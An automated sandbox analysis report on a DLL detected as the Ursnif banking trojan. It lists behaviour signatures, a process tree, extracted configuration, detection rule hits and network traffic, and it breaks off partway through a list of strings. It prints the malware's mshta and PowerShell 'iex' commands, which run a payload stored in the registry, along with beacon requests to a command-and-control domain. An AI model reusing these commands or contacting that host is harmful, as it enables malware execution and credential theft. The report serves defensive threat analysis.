Play interactive tour

Edit tour

Analysis Report yytr.dll

Overview

General Information

Sample Name:	yytr.dll
Analysis ID:	350433
MD5:	ba2befa9c70c2b6d779c48a59cece3e5
SHA1:	4c855f80076e357d35c7d60cd52d2c49abefc5ff
SHA256:	9c51cbe4681facc34623aeca27a18dbaa6db1337990a0e003b7c9babeb06c1eb
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Contains functionality to detect sleep reduction / modifications

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains strange resources

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5964 cmdline: loaddll32.exe 'C:\Users\user\Desktop\yytr.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)

rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

control.exe (PID: 5656 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

iexplore.exe (PID: 6556 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5988 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5920 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4596 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6788 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 2628 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5040 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6564 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 5964	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 4552	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 14 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4552, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline', ProcessId: 5040

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 4552

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: loaddll32.exe.5964.0.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@618321hh", "dns": "618321", "version": "250177", "uptime": "372", "crc": "2", "id": "3131", "user": "4229768108f8d2d8cdc8873a70351dbe", "soft": "3"}

Multi AV Scanner detection for submitted file

Show sources

Source: yytr.dll	Virustotal: Detection: 43%			Perma Link
Source: yytr.dll	ReversingLabs: Detection: 39%

Machine Learning detection for sample

Show sources

Source: yytr.dll

Joe Sandbox ML: detected

Source: 0.2.loaddll32.exe.f50174.3.unpack	Avira: Label: TR/Kazy.4159236
Source: 1.2.rundll32.exe.4520174.4.unpack	Avira: Label: TR/Kazy.4159236

Compliance:

Uses 32bit PE files

Show sources

Source: yytr.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown

HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

Source: C:\Windows\explorer.exe

Code function: 37_2_04DB9064 RegisterDeviceNotificationA,

37_2_04DB9064

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_004051E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02F37AA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	1_2_004051E8
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	37_2_04DBA0C4
Source: C:\Windows\explorer.exe	Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,	37_2_04DBEEAC
Source: C:\Windows\explorer.exe	Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,	37_2_04DB537C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.4:

Source: Joe Sandbox View

ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL

Source: Joe Sandbox View

JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c

Source: C:\Windows\explorer.exe

Code function: 37_2_04DB2690 InternetReadFile,

37_2_04DB2690

Source: global traffic	HTTP traffic detected: GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en
Source: global traffic	HTTP traffic detected: GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en
Source: global traffic	HTTP traffic detected: GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en

Source: unknown

DNS traffic detected: queries for: assets.onestore.ms

Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
